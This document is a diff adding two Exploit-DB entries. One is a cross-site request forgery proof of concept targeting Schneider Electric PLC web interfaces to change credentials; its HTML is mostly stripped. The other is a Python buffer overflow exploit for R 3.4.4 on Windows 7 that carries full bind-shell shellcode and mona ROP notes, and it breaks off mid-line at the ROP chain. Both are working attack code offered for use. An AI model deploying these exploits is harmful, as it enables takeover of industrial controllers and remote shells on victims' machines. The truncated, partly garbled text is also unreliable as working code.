b/exploits/windows/webapps/44678.txt @@ -0,0 +1,103 @@ +# Exploit Title: Schneider Electric PLCs - Cross-Site Request Forgery +# Date: 2018-05-12 +# Exploit Author: t4rkd3vilz +# Vendor Homepage: http://www.schneider-electric.com/ +# Tested on: Windows +# CVE: CVE-2013-0663 +# Version: Schneider Electric Quantum PLC: 140NOE77111, 140NOE77101, 140NWM10000 +# Modicon M340 PLC: BMXNOC0401, BMXNOE0100x, BMXNOE011xx +# Premium PLC: TSXETY4103, TSXETY5103, and TSXWMY100 +# Category: webapps + + + + CSRF POC + + +
+ + + + + + + + + + + + + +
+
+
Name:
+ +
+		 + +
+
& +
Pass:
+ +
+		 + +
+
+
Verify Pass:
+ +
+		 + +
+
+
+ + +
+
+
+ + + + +
+ + + \ No newline at end of file diff --git a/exploits/windows_x86/local/44680.py b/exploits/windows_x86/local/44680.py new file mode 100755 index 000000000..968ed5731 --- /dev/null +++ b/exploits/windows_x86/local/44680.py @@ -0,0 +1,132 @@ +# Exploit Title: R v3.4.4 - Local Buffer Overflow (DEP Bypass) +# Exploit Author: Hashim Jawad +# Exploit Date: 2018-05-21 +# Vendor Homepage: https://www.r-project.org/ +# Vulnerable Software: https://www.exploit-db.com/apps/a642a3de7b5c2602180e73f4c04b4fbd-R-3.4.4-win.exe +# Tested on OS: Microsoft Windows 7 Enterprise - SP1 (x86) +# Steps to reproduce: under GUI preferences, paste payload.txt contents into 'Language for menus and messages' + +# Credit to bzyo for finding the bug (44516) + +#!/usr/bin/python + +import struct + +#root@kali:~# msfvenom -p windows/shell_bind_tcp -e x86/alpha_mixed -b "\x00\x0a\x0d\x0e" -f python -v shellcode +#Payload size: 718 bytes +shellcode = "" +shellcode += "\x89\xe0\xdb\xd2\xd9\x70\xf4\x5b\x53\x59\x49\x49" +shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43" +shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" +shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +shellcode += "\x69\x6c\x59\x78\x6c\x42\x77\x70\x33\x30\x37\x70" +shellcode += "\x31\x70\x6b\x39\x6a\x45\x65\x61\x39\x50\x72\x44" +shellcode += "\x6e\x6b\x30\x50\x56\x50\x4e\x6b\x62\x72\x56\x6c" +shellcode += "\x6c\x4b\x31\x42\x34\x54\x4c\x4b\x62\x52\x64\x68" +shellcode += "\x56\x6f\x68\x37\x70\x4a\x61\x36\x55\x61\x79\x6f" +shellcode += "\x6e\x4c\x75\x6c\x73\x51\x51\x6c\x67\x72\x46\x4c" +shellcode += "\x57\x50\x4b\x71\x5a\x6f\x36\x6d\x76\x61\x6b\x77" +shellcode += "\x7a\x42\x39\x62\x76\x32\x73\x67\x6e\x6b\x36\x32" +shellcode += "\x72\x30\x4e\x6b\x73\x7a\x55\x6c\x4e\x6b\x62\x6c" +shellcode += "\x42\x31\x72\x58\x38\x63\x51\x58\x35\x51\x6b\x61" +shellcode += "\x52\x71\x4e\x6b\x72\x79\x31\x30\x57\x71\x78\x53" +shellcode += "\x6c\x4b\x50\x49\x64\x58\x6b\x53\x77\x4a\x70\x49" +shellcode += "\x6e\x6b\x37\x44\x4e\x6b\x67\x71\x4b\x66\x45\x61" +shellcode += "\x69\x6f\x6c\x6c\x49\x51\x6a\x6f\x46\x6d\x57\x71" +shellcode += "\x5a\x67\x56\x58\x39\x70\x42\x55\x4b\x46\x74\x43" +shellcode += "\x53\x4d\x59\x68\x35\x6b\x73\x4d\x47\x54\x64\x35" +shellcode += "\x5a\x44\x36\x38\x6c\x4b\x56\x38\x57\x54\x76\x61" +shellcode += "\x38\x53\x43\x56\x4c\x4b\x64\x4c\x30\x4b\x6c\x4b" +shellcode += "\x33\x68\x35\x4c\x57\x71\x59\x43\x6c\x4b\x36\x64" +shellcode += "\x6c\x4b\x46\x61\x4e\x30\x6b\x39\x63\x74\x47\x54" +shellcode += "\x55\x74\x31\x4b\x43\x6b\x50\x61\x71\x49\x52\x7a" +shellcode += "\x62\x71\x6b\x4f\x6b\x50\x61\x4f\x51\x4f\x32\x7a" +shellcode += "\x6c\x4b\x66\x72\x5a\x4b\x4c\x4d\x71\x4d\x50\x68" +shellcode += "\x76\x53\x45\x62\x65\x50\x75\x50\x31\x78\x73\x47" +shellcode += "\x71\x63\x74\x72\x31\x4f\x62\x74\x75\x38\x50\x4c" +shellcode += "\x70\x77\x55\x76\x36\x67\x49\x6f\x6b\x65\x6d\x68" +shellcode += "\x7a\x30\x73\x31\x55\x50\x65\x50\x36\x49\x78\x44" +shellcode += "\x33\x64\x62\x70\x65\x38\x65\x79\x6d\x50\x30\x6b" +shellcode += "\x43\x30\x39\x6f\x39\x45\x31\x7a\x56\x68\x70\x59" +shellcode += "\x70\x50\x69\x72\x59\x6d\x37\x30\x70\x50\x71\x50" +shellcode += "\x50\x50\x33\x58\x39\x7a\x46\x6f\x79\x4f\x6d\x30" +shellcode += "\x59\x6f\x69\x45\x7a\x37\x75\x38\x65\x52\x43\x30" +shellcode += "\x37\x61\x63\x6c\x4f\x79\x5a\x46\x31\x7a\x34\x50" +shellcode += "\x30\x56\x31\x47\x45\x38\x39\x52\x79\x4b\x66\x57" +shellcode += "\x42\x47\x59\x6f\x5a\x75\x50\x57\x51\x78\x6c\x77" +shellcode += "\x48\x69\x54\x78\x69\x6f\x6b\x4f\x59\x45\x72\x77" +shellcode += "\x75\x38\x33\x44\x7a\x4c\x75\x6b\x39\x71\x49\x6f" +shellcode += "\x78\x55\x71\x47\x6c\x57\x75\x38\x70\x75\x70\x6e" +shellcode += "\x42\x6d\x35\x31\x79\x6f\x38\x55\x72\x48\x70\x63" +shellcode += "\x42\x4d\x71\x74\x37\x70\x4f\x79\x79\x73\x71\x47" +shellcode += "\x70\x57\x71\x47\x74\x71\x78\x76\x53\x5a\x42\x32" +shellcode += "\x62\x79\x52\x76\x6b\x52\x59\x6d\x35\x36\x79\x57" +shellcode += "\x52\x64\x35\x74\x57\x4c\x37\x71\x43\x31\x4e\x6d" +shellcode += "\x50\x44\x36\x44\x56\x70\x59\x56\x47\x70\x42\x64" +shellcode += "\x46\x34\x70\x50\x36\x36\x50\x56\x50\x56\x71\x56" +shellcode += "\x42\x76\x30\x4e\x73\x66\x76\x36\x66\x33\x76\x36" +shellcode += "\x32\x48\x42\x59\x68\x4c\x55\x6f\x6d\x56\x49\x6f" +shellcode += "\x6b\x65\x4b\x39\x59\x70\x72\x6e\x70\x56\x51\x56" +shellcode += "\x4b\x4f\x34\x70\x51\x78\x34\x48\x4e\x67\x37\x6d" +shellcode += "\x51\x70\x59\x6f\x38\x55\x6d\x6b\x6c\x30\x48\x35" +shellcode += "\x69\x32\x72\x76\x62\x48\x4c\x66\x5a\x35\x4f\x4d" +shellcode += "\x4d\x4d\x69\x6f\x4a\x75\x65\x6c\x67\x76\x73\x4c" +shellcode += "\x47\x7a\x4f\x70\x59\x6b\x4b\x50\x70\x75\x57\x75" +shellcode += "\x6f\x4b\x53\x77\x55\x43\x64\x32\x52\x4f\x51\x7a" +shellcode += "\x53\x30\x46\x33\x4b\x4f\x4b\x65\x41\x41" + +''' +Output generated by mona.py v2.0, rev 582 - Immunity Debugger +-------------------------------------------- +Register setup for VirtualProtect() : +-------------------------------------------- + EAX = NOP (0x90909090) + ECX = lpOldProtect (ptr to W address) + EDX = NewProtect (0x40) + EBX = dwSize + ESP = lPAddress (automatic) + EBP = ReturnTo (ptr to jmp esp) + ESI = ptr to VirtualProtect() + EDI = ROP NOP (RETN) +-------------------------------------------- +''' + +rop = struct.pack('